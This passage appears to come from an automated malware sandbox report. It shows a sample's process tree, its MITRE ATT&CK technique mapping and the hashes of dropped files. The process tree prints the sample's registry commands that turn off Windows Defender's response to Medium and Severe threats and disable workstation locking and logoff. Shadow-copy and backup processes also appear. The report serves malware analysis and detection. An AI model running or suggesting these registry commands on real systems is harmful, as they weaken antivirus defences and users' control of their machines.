C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:4960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:3272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1932
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Modifies registry class
PID:3800
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:4328
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:12812
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:13112
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:11364
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:19112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 15540 -ip 155401⤵PID:9924
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57516cf451e575f6dcc4703ac541324b1
SHA1d14c6e14ce0d26b35df9d802c4fbacef7a845509
SHA256eaff1a66e05c221345a441b3f8310ab4af85a32b2b485bd641e213d55df99c2b
SHA5125dbccbde090a0c1cd889e1f474e59eb490a00b29c9b7968429a19cd4c0302397b3f61f61f6b6edc54c18c08da557066485ec4e4fc2ba7da7c06bede21800d432
-
Filesize
12KB
MD5a704e790b959328689cb46dc27f9eda5
SHA1af22d72d5b071ec041c5de29df95b7a9bad9c9f5
SHA256e67e4013f610b20d9f686e9d36fe18fbfe3c1d0c37d1d015bed5677d8ce1b4ed
SHA51293594842b1505058795c817d3335abeda8c7d6b9c98d7207500a2a1315b93870e31964c75569cc4ef06489e94a8cffdbe376cd257ba8e287212f38db73c8d8e7
-
Filesize
684B
MD5471696b9bffbf4e9727eb3b3e6998f25
SHA1f6c7c359341256c14a39b1efa35cdf13d0c188c1
SHA256c9475dcf6e654cdb1deb2e02e7f408f2edc8809553dc3663db65d991a764d9ef
SHA5129a365fba750351e61b82fb41a50847697dcc87a06d902084364b6f07f2e20ea29b8813dc90ae3aef17646aad13a0f869182d926390199c25a589e12bcc3a3290